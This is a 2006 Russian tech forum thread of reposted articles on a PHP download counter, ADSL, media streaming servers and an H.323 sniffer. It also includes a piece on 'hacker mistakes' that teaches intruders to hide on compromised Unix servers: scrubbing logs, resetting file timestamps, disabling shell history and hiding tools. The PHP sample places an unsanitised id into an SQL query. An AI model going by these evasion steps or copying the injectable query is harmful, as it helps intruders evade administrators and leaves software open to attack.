print "<center><div style=background-color:orange;color:000000>Best soft</div></center>";

….

Теперь возьмем всю информацию из таблицы, то есть мы выполним такой запрос:

$re=mysql_query("select * from download order by uid desc");

Возникает законный вопрос: что такое desc? Рассказываю. Это нужно для того, чтобы тот файл, который был добавлен последним, являлся первым в списке вывода.

Далее все просто: мы перебираем весь архив и выводим его на нашу страничку (листинг 2).

while($res=mysql_fetch_array($re))

{

print "<div style='border-left: 1px orange solid;border-right: 1px orange solid;border-bottom: 1px orange solid;padding:6px'>

<a href='download.php?id=$res[uid]'><b>$res[file]</b></a>

<div class=tekst>$res[ops]<br>

Скачиваний: ($res[click])<br>

</div></div>";

}

При клике на ссылку скрипту download передается параметр id, и скрипт выдирает из таблицы всю нужную информацию.

В скрипте download.php, как всегда, соединяемся с MySQL и выполняем точно такой же запрос, как и в предыдущем скрипте, но здесь необязательно писать desc. Далее снова перебираем весь полученный массив и сравниваем переменную $id, полученную из стартовой страницы. $res[uid] — это уникальные идентификационные номера каждой программки. Если они совпадают, то мы увеличиваем на 1 число, стоящее в таблице в поле click (поле click отвечает за число скачиваний, если ты не забыл) .Потом просто делаем перенаправление на адрес, сгенерированный из таблицы (листинг 3).

while($res=mysql_fetch_array($re))

{

$click = $res[click];// В этой переменной хранится количество скачиваний




Автор: Metallica Dec 7 2006, 11:50

if ($id == $res[uid])// Проверяем совпадение id из формы и uid из таблицы

{

$file = $res[file];

$server = $res[server];

$put = "$server$file";// Генерим адрес программы

$click = $click + 1;

mysql_query("UPDATE download SET click=$click WHERE uid=$id");

header("location:$put");// А здесь перенаправляем

}

}

[один минус] этой системы, заметный не всем, — то, что при клике на ссылку появляется стандартное окно закачки и внутри него в поле «Источник» будет вписан истинный адрес сервера, откуда пользователь качает файл. Однако если используется утилита типа Flash Get, то ты ничего не увидишь больше, кроме имени закачиваемого файла.

Вот и все. Надеюсь, эта статья заинтересовала всех тех, кто хочет сэкономить на хостинге. Кстати, для хранения софта лучше пользоваться бесплатным хостингом www.h1.ru

Ссылки по теме

ТИП: WWW

www.offbit.1gb.ru/download — ЗДЕСЬ МОЖНО НАЙТИ СИСТЕМУ, ОПИСАННУЮ ВЫШЕ, В РАБОЧЕМ РЕЖИМЕ.

www.woweb.ru — ЦЕЛЫЙ АРХИВ PHP-СКРИПТОВ НА ЛЮБОЙ ВКУС.

www.h1.ru — БЕСПЛАТНЫЙ ХОСТИНГ. ДАЖЕ КРУЧЕ, ЧЕМ narod.ru.

www.1gb.ru — ПО-МОЕМУ, ЛУЧШИЙ ПЛАТНЫЙ ХОСТИНГ.


Автор: Frut Dec 7 2006, 14:05

Metallica, эти километры статей ты сам врят ли прочитал. Маловероятно, что они кому-нибудь нужны.

Автор: Metallica Dec 7 2006, 14:10

Цитата(Frut @ Dec 7 2006, 15:05) *

Metallica, эти километры статей ты сам врят ли прочитал. Маловероятно, что они кому-нибудь нужны.

Нескажу шо прямо все читал но про всякие интересные штуки почитываю!!

Автор: Metallica Dec 7 2006, 21:15

ADSL изнутри



К нам приходят письма с просьбами рассказать о технологии ADSL, вот одно из них: «Слышал, что можно подключится к Интернету по обычной телефонной линии так, чтобы была большая скорость и линия свободна. Возможно ли это и как это сделать?». Мы решили рассказать тебе что же за технология скрывается за аббревиатурой ADSL.

Начать с письма в редакцию, в котором звучит просьба: рассказать о технологии ADSL.

Сегодняшний инет заточен под скоростное соединение, с этим уже не поспоришь. Так что нравится тебе это или нет, приходится придумывать способ перехода со старого доброго dial-up’а на что-то более широкополосное. Ты знаешь, что современные телефонные линии вместе с модемом позволяют обмениваться данными на скорости до 64 кбит/с, а этого явно недостаточно для большинства современных интернет-сервисов. Выход есть – организация выделенного канала. Но проводить в офис или квартиру оптический кабель или медную пару очень дорого и не всегда возможно. Поэтому и была разработана технология ADSL (Asymmetric Digital Subscriber Line) - технология асимметричного цифрового соединения, позволяющая организовать выделенный канал доступа в интернет по обычной телефонной линии. При этом телефон и интернет работают независимо друг от друга.

Принцип DASL заключается в одновременной передаче по телефонному кабелю высокоскоростного нисходящего потока к пользователю и низкоскоростного восходящего потока от пользователя в сеть без влияния на телефонию. В высокоскоростном нисходящем потоке и низкоскоростном восходящем потоке передается цифровая информация. Пользователи, использующие аналоговую телефонию, могут продолжать ей пользоваться одновременно с ADSL. Эта функция осуществляется Это достигается за счет частотного разделения «медной пары» с помощью специального устройства – сплиттера. Сплиттер – разделитель DSL/POTS сигналов. В его функции входит направлять DSL-сигналы (частоты) на ADSL-модем и отделять их от POTS-сигналов, которые направляются на обычные телефонные аппараты, факсы и т.д.

В настоящее время технология ADSL - самая продвинутая в семействе xDSL, она обеспечивает передачу по электрическому кабелю потоков до 8 Мбит/с в одном направлении (как правило, в сторону пользователя) и до 1,5 Мбит/с – в другом. Это обосновано тем, что от пользователя чаще всего идут запросы на загрузку страниц, веб-приложений или мультимедиа потоков, имеющих небольшой объем. Хотя канала в 1,5 Мбит/с вполне достаточно и для передачи видеопотока в видеоконференциях. Технически асимметрия реализуется за счет распределения частотного спектра передачи в пользу потока абонента. Для каких же задач хватит входного канала в 8 Мбит/с? Загрузка видео и музыки: mp3(средний размер файла 5 Мб) получаем за 6-10 секунд, фильм DivX (700 Мб) – 20-25 минут. Самые требовательные к сети игры – без проблем. При этом канал работает круглосуточно (есть постоянная связь по интернет-пейджерам).

Схема подключения следующая: компьютер пользователя подключается к телефонной линии через ADSL-модем и сплиттер.

Телефонная линия используется только от пользователя до его телефонной станции, где при помощи такого же сплиттера и ADSL-модема канал коммутируется включается в волоконно-оптическую сеть провайдера. В результате получаем высокоскоростное подключение к интернету с минимальными затратами как ресурсов, так и времени.

Впрочем, более подробно о подключении ADSL и его преимуществах мы поговорим в следующем номере. Удачи!


Редакция выражает благодарность "Точке Ру" за помощь в подготовке материала.

http://www.tochka.ru/ тел.753-82-82




Автор: Metallica Dec 7 2006, 22:12

Десять роковых ошибок хакера.
Познание секретов маскировки

Молодой хакер, на счету которого было огромное количество взломанных машин, безуспешно пытался зайти на сервер международного банка. Эту систему он наконец-то взломал, потратив на нее несколько бессонных ночей. "Неужели засекли? Я же чистил логи и был предельно осторожен", - вертелось у него в голове. Внезапно его раздумья прервал тонкий писк UPS, что означало отключение электропитания. Затем раздался громкий стук в дверь, за которой стояли вооруженные работники федеральной службы. Эта история закончилась бы печально, если бы горе-хакер не... проснулся от писка своего будильника.

На самом деле, мало кто из хакеров станет взламывать банковские системы, не зная азов собственной безопасности. Админы на стратегически важных системах - люди неглупые и получают за свою работу хорошие деньги, поэтому соревноваться с ними в знаниях компьютерных технологий очень опасно.

Но ведь ломают! Ломают и удерживаются незамеченными на серверах месяцами, а то и годами. И все благодаря элементарной маскировке. Достигается она, как правило, соблюдением нескольких неписаных законов, которые знает каждый уважающий себя хакер. Нарушив одно из таких правил, можно стать уязвимым для админов, которые своевременно обнаружат и нейтрализуют найденного взломщика. При этом последствия для нарушителя могут быть весьма плачевными.

Тебе интересно, о каких нарушениях идет речь? В этом материале я кратко изложу десять ошибок хакера, которые, на мой взгляд, являются самыми популярными. Ошибки актуальны в основном для unix-like систем, поэтому любителей Windows попрошу не питать особых надежд.

1. Чистка логов

Как ни странно, мало кто любит чистить логи во взломанной системе. А ведь именно по логам админ обнаруживает вторжение. Давай рассмотрим механизм создания логов в unix-like операционке.

Как правило, служебная информация скидывается в файл при помощи функции syslog(). Эта функция напрямую работает с демоном syslogd, либо с его альтернативой (syslog-ng, например). У этого демона есть свой конфигурационный файл (по умолчанию /etc/syslog.conf), в котором подробно указывается местонахождение log-файлов и критерии для того или иного лога, чтобы корректно отделить мух от котлет. Хакер часто забывает, что админ может сменить названия дефолтовых журналов, перенаправив /var/log/secure, к примеру, в /usr/admin/secure. К тому же логи могут писаться в консоль конкретному юзеру, что сильно затрудняет положение хакера.

Чистка таких файлов должна осуществляться с особой осторожностью: проверенными логвайперами, либо руками (идеальный вариант). Я лично встречал такие логвайперы, после применения которых журналирование данных останавливалось. Думаю, добропорядочный админ при таком раскладе быстро заметит неполадки в системе.

Как ни странно, руками вычистить текстовые логи очень просто. Вначале необходимо узнать, есть ли в логах данные, которые следует убрать (например, ip хакера или логин в системе). Затем эта информация старательно вычищается из отдельно взятого журнала с последующим перенаправлением во временный файл. И лишь после этого временный файл переименовывается в настоящий. Эти операции осуществляются при помощи стандартных команд grep и mv. Их можно также провести и при помощи внешних редакторов (vi, ee, mc).

Если с чисткой текстовых логов не возникает особого геморроя, то обрабатывать бинарные файлы несколько сложнее. Тут не обойтись без специальных логвайперов, понимающих структуру следующих файлов: /var/log/wtmp, /var/log/lastlog и /var/run/utmp.

Часто хакеры решают проблему простой командой rm. Но если админ увидит, что за последний месяц в его системе не было пользователей, взломщику от этого лучше не станет. Удалять можно лишь utmp-файл, отображающий пользователей в системе в данный момент времени. После удаления должна последовать команда touch, создающая файл заново. Если этого не сделать, бинарник /usr/bin/w ругнется на отсутствие utmp, а запись онлайн юзеров производиться не будет.

2. Изменение даты на файлах

Дата на файлах - уязвимое место хакера. Именно по дате программы-следилки за системой определяют установку руткита, либо изменение системных файлов. Сменить дату на файле позволяет команда touch с параметром -t, после которого идет дата в формате: МесяцДеньЧасМинутаГод. Взломщики очень часто забывают менять дату обратно на старую после правки конфа либо перезаписи бинарника. Админские утилиты быстро определяют изменения в системе и посылают подробный отчет администратору на мыло.

3. История команд

Незаменимый атрибут любого шелла - хранение истории команд, набранных пользователем. Это сделано, чтобы иметь возможность повтора набранной когда-то команды. Файл с историей команд в первую очередь изучается хакером при удачном взломе системы, чтобы получить первоначальную информацию о деятельности админа, либо вытянуть пароли из консольных программ.

Но если посмотреть с другой стороны, то и админ может быть параноиком, регулярно изучающим свой собственный history-файл. И если хакер порядочно наследил в системе, оставив таким образом историю установки руткитов или DoS'еров, реакция администратора непредсказуема. Поэтому каждый взломщик должен своевременно заметать свои следы.

Местонахождение history-файла можно узнать через переменную среды HISTFILE, просмотрев ее консольной командой echo $HISTFILE. Соответственно после команды export HISTFILE=/dev/null запись команд в файл прекратится. Внимание! Данный прием работает только на время текущей сессии, поэтому хакеру придется выполнять команду каждый раз при появлении в системе.

4. Заражение системы руткитами

Как это ни парадоксально, но установка руткитов может запросто выдать хакера. Во-первых, заменяя системные файлы, он, как правило, совершает ошибку №2, так как устанавливать первоначальную дату на туеву хучу бинарников мягко говоря долго и неспортивно. Во-вторых, если админ установил новую версию пакета (binutils, например), то установка старой поверх системной ни к чему хорошему не приведет. Более того, нарушителя могут выдать ключи к командам, задаваемые alias'ом. К примеру, старая версия /bin/ls не понимает ключа --colors, а многие руткиты содержат именно старые версии. Иными словами, установив старый руткит на новую систему, хакер автоматически подписывает себе смертный приговор.


5. Установка своего софта

Взломав систему, нарушитель нередко ставит на нее свой софт, к примеру, socks или nmap, что вполне логично - ему была необходима подопытная система, и он ее получил. Но даже если процессы взломщика скрываются, то в этом случае админ может обнаружить открытый 1080-ый порт в системе. Тогда он быстро догадается, в чем дело, и тем самым раскроет маскировку хакера.

На самом деле, после взлома нарушитель анализирует деятельность админа и делает выводы о степени запущенности сервера. Но устанавливать свои программы в корневые директории все же не стоит. Чтобы этого избежать, хакер должен создать свой отдельный скрытый каталог и ставить весь боевой софт в него. Это достигается командой ./configure --prefix=/path/to/hidden/xakep_dir при установке пакетов.

6. Сканирование со взломанной системы

Самая распространенная ошибка среди всех перечисленных. Ведь скан с порутанного сервера никогда не приводит ни к чему хорошему. Смотри сам: взломщик сканирует подсеть nmap'ом или другим доступным сканером. После чего законопослушный админ просканенной сетки может написать жалобу в abuse компании, с которой производился скан, с высылкой всех логов, доказывающих факт вторжения. Служба безопасности, закрепленная за компанией, в свою очередь приходит к выводу, что их сервер поломали, и стучат по голове администратору. Ясно, что после этого инцидента хакеру на сервере не жить.

Конечно, эта ситуация далеко не типична. Из-за инертности наших доблестных админов сканирование часто сходит хакеру с рук. Но имей в виду, что он может нажить себе лишние проблемы, ведя активную деятельность со взломанного сервера.

7. Изменение рулесов фаервола

Фаервол - личное дело админа. И если он его установил, подразумевается, что он знает все его правила как свои пять пальцев. Если же взломщик будет их настраивать на свой вкус, то рано или поздно админ пресечет эти деяния. Исключение могут составлять жуткие нагромождения правил, составленные явно не администратором системы. Добавление неприметной записи в эту гремучую смесь не вызовет катастрофы.

Если же фаервол содержит несколько удобочитаемых правил, и, судя по HISTFILE, администратор регулярно следит за ними, то ничего не остается, кроме как подчиниться им, либо изменить исходники фаервола (для C гуру). Это, кстати, самый классный вариант.

8. Добавление новых пользователей

Довольно типичная ситуация: взломав систему, хакер делится впечатлениями о взломе в IRC или ICQ. Его лучшие друзья тут же начинают выпрашивать шелл для личных нужд. Поразмыслив немного, взломщик добавляет пользователя в систему, успокаивая себя, мол, шелл-то не рутовый, чем он может мне помешать. На следующий день администратор получает утренний отчет об аномальных происшествиях в системе и находит в нем интересную строку, например:

New users:





xakep:x:31337:31337:Xakep user:/home/xakep:/bin/bash

Теперь можно попрощаться с root-аккаунтом на взломанной тачке.

Чтобы такого не происходило, в системе не должно быть новых пользователей со стороны взломщика. Лучше всего проверить на прочность уже существующие учетные записи и пользоваться ими.

9. Допуск в систему посторонних лиц

Эта ошибка похожа на предыдущую, но есть одно отличие. Нередко у хакера просят доступ к серверу через его же собственные бэкдоры. После предоставления такого доступа можно сразу попрощаться с сервером. Все люди разные, и постороннее лицо может легко нарушить все вышеописанные правила за один сеанс работы, тем самым нарушив твою маскировку в системе.

Грамотный хакер никогда не создает подобных ситуаций. Более того, он не треплется о взломе где попало, всегда ставя собственную безопасность на первое место. Нарушение данного правила возможно лишь в случае, если ты убежден, что после предоставления доступа у тебя не возникнет лишних проблем.

10. Выбор профессии хакера

Да, ты не ослышался! Хакер - как сапер, первый раз ошибается еще при выборе своей профессии. Каждый взлом может оказаться для него фатальным, и сам он это осознает. Но не может с этим смириться, считая взлом экстремальным видом спорта. Если ты все еще раздумываешь, "быть или не быть хакером", то я дам тебе совет. НЕТ! Быть хакером уже не так модно, да к тому же опасно. Так что займись лучше чем-нибудь другим, например, продажей школьных выпускных сочинений по русскому языку через интернет smile.gif.

Вот, собственно, и все оплошности, приводящие к печальным последствиям. Но, еще раз повторюсь, все эти ошибки актуальны лишь в системе, за штурвалом которой сидит добросовестный админ, заслуженно получающий свою зарплату. В запущенных серверах, где админ мониторит систему по пьяни и только по праздникам, можно творить что угодно - хуже все равно не будет.

Этот материал призван показать типичные случаи, когда хакеры выдают себя во взломанной системе. Не следует считать это руководством к действию. Прежде чем совершить непоправимое, прочитай еще раз 10 пункт. В мире ведь еще столько интересного smile.gif.

Утилиты-следилки или помощь админу

В этой статье не раз упоминалось про админские утилиты. Они представляют собой программы, которые ежедневно сканируют систему (md5-сумма бинарников, изменение в конфах, процессах и т.п.) и сравнивают изменения в своей базе. После чего генерируют отчет и шлют его админу на мыло. Сама прога висит в виде демона или запускается crontab'ом. Примером такой утилиты является программа tripwire.


Автор: Metallica Dec 7 2006, 23:28

Вещаем в сети! Курс начинающего медиамагната



В одном из прошлых номеров я рассказывал о том, как создать свой собственный потоковый музыкальный сервер. На эту статью пришло довольно много откликов с просьбой дать более подробную информацию о вещании, как аудио, так и видеопотоков. Сегодня мы продолжим разговор об mp3-серверах, подробно остановимся на потоковых киносерверах и затронем не менее интересную тему – телевидение и сеть. После прочтения ты сможешь, используя самый обычный ТВ-тюнер и свой любимый дистрибутив линукса, не только сам смотреть телепередачи, но и показывать их своим односетчанам!

Мал ffmpeg, да дорог

Разработчики ультрабыстрого аудио/видео конвертера ffmpeg с недавнего времени закрыли анонимный доступ к своему CVS-репозиторию, поэтому придется скачать автоматически генерируемый ежедневный снапшот исходного кода. После распаковки архива перейдем в созданный каталог, озадачим скрипт configure инсталляционным каталогом, скомпилируем и установим:

$ tar zxvf ffmpeg-cvs-YEAR-MONTH-DAY.tar.gz

$ cd ffmpeg-cvs-YEAR-MONTH-DAY

$ ./configure --prefix=/usr/local/ffmpeg

$ nice make

# make install

В итоге мы получим статически слинкованные (т.е. не зависимые от программных библиотек) кодек libavcodec для воспроизведения видеоданных и ffserver для реализации потокового вещания. Простейший конфигурационный файл (синтаксис которого очень напоминает конфиг Apache) потокового mp3-сервера может состоять всего лишь из четырех строчек:

# vi /etc/ffserver.conf

<Stream girls.mp3>

File /path/to/mp3/girls.mp3

Format mp2

</Stream>

Хотя, конечно же, корректней будет сразу задать все необходимые параметры:

<Stream test.mp3>

File /path/to/music/girls.mp3

Format mp2

AudioCodec mp3

AudioBitRate 64

AudioChannels 1

AudioSampleRate 44100

NoVideo

</Stream>

Запускаем ffmpeg-сервер и проверяем, за’bind()’ился ли он на дефолтный 8080 порт:

# /usr/local/ffmpeg/bin/ffserver -f /etc/ffserver

# netstat -na --inet | grep 8080

tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN

Если у тебя этот порт занят апачем или проксей, то в конфиге просто переопредели его значение директивой Port:

Port 8090

Что же подразумевают под потоковым аудио и видеовещанием? Обычно мы действуем последовательно: с удаленного сервера скачиваем на винт нужный файл и скармливаем его проигрывателю. В случае с потоковой информацией все происходит совсем по-другому: сервер, на котором хранятся транслируемые данные, единовременно осуществляет одностороннюю доставку всем клиентам, подписавшимся на определенный виртуальный канал. Доставка происходит односторонняя, так как пользовательские плееры не отправляют никаких команд на сервер, а просто воспроизводят полученные данные в реальном времени, не сохраняя их на жесткий диск.

Теперь для проверки на клиентской машине открываем Winamp, указываем адрес только что созданного mp3-сервера: Add -> Add URL http://ip.address.of.ffserver/test.mp3 и наслаждаемся запрошенной композицией. Для трансляции видео поступаем точно таким же способом (тестовый видеоролик sample.asf можно взять из установленного WinXP в каталоге Program Files\Movie Maker):




Автор: Metallica Dec 8 2006, 11:08

# vi /etc/ffserver.conf

<Stream test.asf>

File /path/to/movies/sample.asf

Format asf

</Stream>

Перезагружаем ffserver, вызываем Windows Media Player и вводим в адресную строку расположение, обрати внимание, не ролика, а созданного потока: File -> Open URL http://ip.address.of.ffserver/test.asf. Если возникнет необходимость транслировать видеоданные без звукового сопровождения, то следует добавить директиву NoAudio. Как ты мог заметить, в приведенных выше примерах файлы транслируются в сеть «по одному». К сожалению, ffserver не умеет работать с плейлистами, зато понимает так называемый глоббинг (раскрытие имен файлов):

File /path/to/music/*

Ограничение пропускной способности и числа одновременно подключенных пользователей; поддержка протоколов RTPS, SDP и списков контроля доступом ACL; работа с самыми различными аудио и видеоформатами: MP3, OGG, AC3, Real Audio, Macromedia Flash, MPEG1, MPEG4; журналирование пользовательских запросов – со всеми этими задачами прекрасно справляется ffserver. Очевидно, что при минимальных системных требованиях сервер ffmpeg предоставляет достаточно широкие возможности для развертывания потокового мультимедийного сервера, однако практически полное отсутствие документации портит впечатление об этой программе.

Какие же задачи мы хотим решать с помощью потокового сервера, и какие компьютерные мощности можем выделить для этих целей? Если планируется создание исключительно mp3-сервера, то вполне достаточно будет P133 с 32 Мб ОЗУ, либо P233 с 64 мегами в случае со связкой Apache + mod_mp3. Для небольшого потокового киносервера потребуется как минимум шустрый селерон со 128 Мб оперативки на борту плюс производительная дисковая подсистема, а для трансляции телепередач по локальной сети хорошей отправной точкой станет PIII, так как сжатие в MPEG1/MPEG4 будет производиться «на лету». Тестирование проводилось в 100-мегабитной сети. Сервером выступал Celeron600/128mb/80G/Gentoo Linux 1.4rc4. Роль клиентов выполняли компьютеры с установленными Win98SE и WinXP Pro SP1.

Кошерное яблочко

Прямой противоположностью маленькому, быстрому и свободно распространяемому ffmpeg выступает Darwin Streaming Server - монументальный потоковый сервер от небезызвестной компании Apple. Но не спеши обременять свой download manager новой ссылкой, так как сначала придется немного потрудиться и заполнить на сайте анкету, как всегда согласившись со всем, что предлагают. Только после этой не слишком утомительной процедуры тебе разрешат скачать девять с половиной (нет, не недель) мегабайт удовольствия. Почему удовольствия? Суди сам: поддержка форматов MP3, MPEG1, MPEG4; поддержка протокола SSL для создания защищенных соединений; симпатичный и интуитивно понятный web-интерфейс; удобная работа с плейлистами (drag’n’drop присутствует); простота в администрировании; тесная интеграция с проектом mpeg4ip (кодирование, транслирование и воспроизведение MPEG4). Итак, после того, как ты расправишься с архивом, предстоит произвести ряд не совсем привычных команд, поскольку стандартной установку сервера никак не назовешь:# tar zxvf DSS-4_1_3.src.tar.gz

# cd DSS-4_1_3.src

# ./Buildit

# mkdir altroot

# ./DSS_MakeRoot -f altroot

# cd altroot

# ./Install

После выполнения последней команды свежеиспеченные бинарики растасуются по каталогам, затем будет выдано приглашение дважды ввести пароль администратора DSS и вуаля – наш сервер установлен и запущен. Но для возможности конфигурирования через web-интерфейс еще потребуется загрузить перловый скрипт:

# /usr/local/sbin/streamingadminserver.pl

Теперь в браузере набиваем http://ip.address.of.dss:1220/ и настраиваем потоковый сервер, создаем плейлисты и смотрим в «онлайновые» логи. Процесс конфигурирования абсолютно никаких сложностей не вызывает, поэтому здесь останавливаться не буду. Заботливые разработчики в каталоге /usr/local/movies уже приготовили для тебя по два mov и mp4 файла (в разном качестве), так что можно немедленно приступать к проверке работоспособности сервера. Запускай на клиенте либо QuickTime Player, либо RealAudio Player, вводи rtsp://ip.address.of.dss[:port]/sample_300kbit.mp4 и оценивай результат. Нельзя не упомянуть и о многоплатформенности Darwin Streaming Server. Разработчики портировали свое детище - помимо версии для Mac OS X (родная ось для него) есть версии и под Linux, на Solaris, FreeBSD и даже Windows. Потратив немного времени, мне удалось заставить его работать и на OpenBSD 3.2. Также не забывай поглядывать в bugtraq и обновлять DSS, так как в нем периодически обнаруживают различные уязвимости.

Решения от лягушатников

VideoLAN Сlient – молодой проект французских студентов, главной целью которого является трансляция потокового видео в локальных сетях. Юникастное и мультикастное вещание по протоколам UDP и RTP; видео по запросу (Video On Demand); поддержка впечатляющего числа аудио и видеоформатов; работа с тарелками, хардварными MPEG-энкодерами, web-камерами, TV-тюнерами и DVD; работа в режиме медиаплеера – все это умеет VLC. На данный момент существуют версии под Windows, Linux, Free/OpenBSD, Mac OS X и BeOS. Определенную сложность может вызвать инсталляция этой программы, так как, например, для полной установки на Red Hat Linux кроме стандартных средств разработки потребуется выкачать и установить около 50 (!) rpm’ок зависимостей. Если же вручную собирать из сырцов полную версию, то потребуется примерно 20 зависимостей. Но легче от этого не становится… Поэтому для тех, кто хочет получить работоспособную программу и в то же время прилично сэкономить на трафике, предлагаю вот такой способ установки: при конфигурировании отключаем все, чем можно пренебречь, а именно: поддержкой DVD, тарелок, исков, буфера кадров, библиотеки SDL, протокола SLP и аудиоформата OGG. При таком подходе ни одной зависимости доставлять не потребуется.

$ tar zxvf vlc-0.5.3.tar.gz

$ cd vlc-0.5.3

$ ./configure --prefix=/usr/local/vlc --disable-dvd --disable-dvbpsi --disable-ogg --disable-vorbis --disable-x11 --disable-xvideo --disable-sdl --disable-freetype --disable-fb --disable-gtk --disable-wxwindows --disable-slp --disable-mad

$ make

# make install

Для того чтобы транслировать файл (в данном случае в формате MPEG1), достаточно ввести следующую команду:

# /usr/local/vlc/bin/vlc /usr/local/movies/cradle.mpg --sout udp://192.168.5.21

Чтобы транслируемый поток направить в другую подсеть, например, через 7 роутеров, нужно добавить ключ –ttl 8 (число роутеров + 1). Для зацикливания проигрываемого файла используй флажок –loop, а для вывода отладочных сообщений –vvv. Теперь для приема видеоклипа на хосте с IP-адресом 192.168.5.21 открываем VLC (win32) и выбираем в меню File -> Network Stream -> UDP/RTP Port 1234.

Декомпрессия MPEG у клиента происходит следующим образом: кодек разделяет MPEG-трафик на две составляющие: аудио и видеоинформацию. Аудиоданные декодируются и через усилок попадают на динамики, а видео проходит через анализ и расшифровку фреймов, затем изображение просчитывается и выводится на экран.

VideoLAN Server - еще одна разработка кодеров из университета Ecole Centrale Paris. В отличие от клиентской версии, VLS не умеет принимать, декодировать и воспроизводить MPEG-потоки, зато включает в себя telnet-сервер для удаленного конфигурирования и поддерживает протокол IPv6. Серверный вариант требует обязательной установки библиотеки dvbpsi:

$ bunzip2 < libdvbpsi-0.1.2.tar.bz2 | tar xvf -

$ cd libdvbpsi-0.1.2

$ ./configure

$ make

# make install

И устанавливаем сам VLS:

$ bunzip2 < vls-0.5.0.tar.bz2 | tar xvf -

$ cd vls-0.5.0

$ ./configure --prefix=/usr/local/vls --disable-dvd

$ make

# make install

# ldconfig

Конфигурационный файл VLS неплохо прокомментирован, поэтому для экономии места я приведу только ключевые разделы конфига:

# vi /etc/vls.cfg

/* Заставляем VLS подвиснуть на 9999 порт */

BEGIN "Telnet"

LocalPort = "9999"

Use = "true"

END

/* Указываем абсолютный путь до транслируемого файла */

BEGIN "1"

Name = "presentation"

FileName = "/usr/local/movies/presentation.vob"

Type = "Mpeg2-PS"

END

/* Определяем виртуальные каналы */

BEGIN "Channels"

localhost = "network"

client1 = "network"

END

/* Описываем клиента */

BEGIN "client1"

DstHost = "192.168.5.21"

DstPort = "1234"

END

Загружаем VLS:

# /usr/local/vls/bin/vlsd –f /etc/vls.cfg

Телнетимся на 9999 порт сервера, вводим пасс админа и набираем команду для транслирования презентации:

admin@vls> start presentation client1 local1

Сканируем метровые диапазоны

Если твой компьютер оснащен ТВ-тюнером с поддержкой SECAM D/K, то рано или поздно у тебя возникнет резонный вопрос: можно ли смотреть телепередачи под Linux? Без проблем! И в этом ты сможешь убедиться прямо сейчас. Но для начала все же проверь, скомпилировано ли твое ядро со всеми необходимыми функциями:

Включены ли экспериментальные свойства ядра?

Code maturity level options --->

[*] Prompt for development and/or incomplete code/drivers

Добавлена ли поддержка загружаемых модулей?

Loadable module support --->

[*] Enable loadable module support

[*] Kernel module loader

Установлена ли поддержка интерфейса I2C?




Автор: ismolnik Dec 8 2006, 12:52

Что такое интерфейса I2C
и с чем его едят?

Автор: Metallica Dec 8 2006, 14:56

Цитата(ismolnik @ Dec 8 2006, 13:52) *

Что такое интерфейса I2C
и с чем его едят?

Флуд
Вот задай вопрос к Яндексу


Автор: ismolnik Dec 8 2006, 15:04

Извини.
Буду ждать доступа
К Яндексу.

Автор: Metallica Dec 8 2006, 20:32

Сам себе IP-телефон. VoIP для программераСтрашное слово IP-телефония для многих связано с дорогими шлюзами известных фирм типа Cisco или Vocaltech, что придает этому понятию некий ореол таинственности и немеренной сложности. Но ведь H.323 это всего лишь протокол, положенный поверх TCP/IP, и работать с ним сможет программа, запущенная на обычном компьютере, и по идеологии своей особо не отличающаяся от собратьев, профилирующихся на протоколах HTTP или ICQ. Сегодня мы напишем простой снифер, который позволит выгребать всевозможную информацию из сигнализации H.323, независимо от того, снифит ли он промышленный VoIP шлюз Cisco или обычный NetMeeting в твоей локалке.

Страшный зверь ASN.1

В формировании пакетов H.323 задействованы 3 алгоритма бинарной сериализации, это TPKT3, Q.931, и ASN.1. Если с первыми двумя все просто, и работа с ними сводится к разбору линейных байтовых полей, то с ASN.1 (Abstractive Syntax Notation One) следует разъяснить ситуацию. Практически ASN.1 - это не пакетный протокол, а компилятор-декомпилятор логических структур, написанных на собственном языке. Сначала создается описание пакета с использованием примитивных типов вроде INTEGER, STRING и тому подобных, конструкций вроде массивов и других языковых заморочек, а также сложных типов SEQUENCE и CHOICE. Если сравнивать с конструкциями языка C, то SEQUENCE подобен структуре (struct), а CHOICE - объединению (union). После этого данное описание компилируется в байт-код, который вкладывается в поле IE:USER-USER пакета Q.931 (стоит обратить внимание, что в H.323 поле длины данного IE расширено до двух байт, когда в классическом ISDN’овском Q.931 поле длины любого IE - один байт, этот нюанс иногда вносит путаницу). Этот пакет, в свою очередь, вкладывается в оболочку TPKT3. Пакет готов для отсылки в сеть. Декодировка пакета происходит аналогичным образом, только в обратную сторону. Транспорт и методы передачи различных протоколов семейства H.323 я рассматривал в предыдущей статье "VoIP изнутри", замечу лишь, что уровень TPKT присутствует только в самостоятельных пакетах, идущих по транспорту с гарантированной доставкой (H.225 и нетуннелированный H.245 поверх TCP), а оболочка Q.931 создается только вокруг пакетов H.225. Схема упаковки TPKT-Q.931-ASN.1 представлена на рисунке.

Компилируем сигнализацию

В свое время я пытался написать компилятор ASN.1, ибо стандарты для него открыты, но после трех месяцев возни понял, что дело это неблагодарное, и надо искать готовый. Найдено их было превеликое множество, но все они, к сожалению, оказались коммерческими и стоили немалых денег. Я почти отчаялся, когда наткнулся на кроссплатформенную opensource библиотеку PWLIB, которая решила все мои проблемы. Утилита asnparser, которая входит в состав pwlib, это не просто asn-компилятор, а замечательное средство разработки, которое позволяет генерить из описаний ASN.1 классы для C++. Каждый такой класс имеет методы Encode() и Decode(), позволяющие компилировать бинарный asn-код, предварительно заполнив поля класса данными, и наоборот, декомпилировать бинарные asn-пакеты, заполняя поля класса данными, содержащимися в этом пакете.

Я вооружился всеми нужными мне описаниями структур в ASN.1, слитыми с сайта ITU-T (должен сказать, что их объем, необходимый для самой примитивной работы, был немалым), и приготовился к созданию горы классов C++ с помощью asnparser'а и к последующей их отладке бессонными ночами. Но и тут фортуна от меня не отвернулась, т.к. оказалось, что ребята из открытой инициативы OpenH323 уже давно сделали это за меня. Естественно было предположить, что opensource'ная команда, работающая в этом направлении не один год, создала более грамотный продукт, чем тот, что сваял бы я в одно лицо, начав с нуля. Приятным сюрпризом оказалось и то, что в библиотеке OpenH323 присутствуют классы для работы с Q.931 и грамотно перегруженные операторы классов iostream, позволяющие выводить для просмотра все пакеты в human-readable виде, а также готовый конструктор высокоуровневых вызовов для создания своего H.323-терминала без особых усилий.

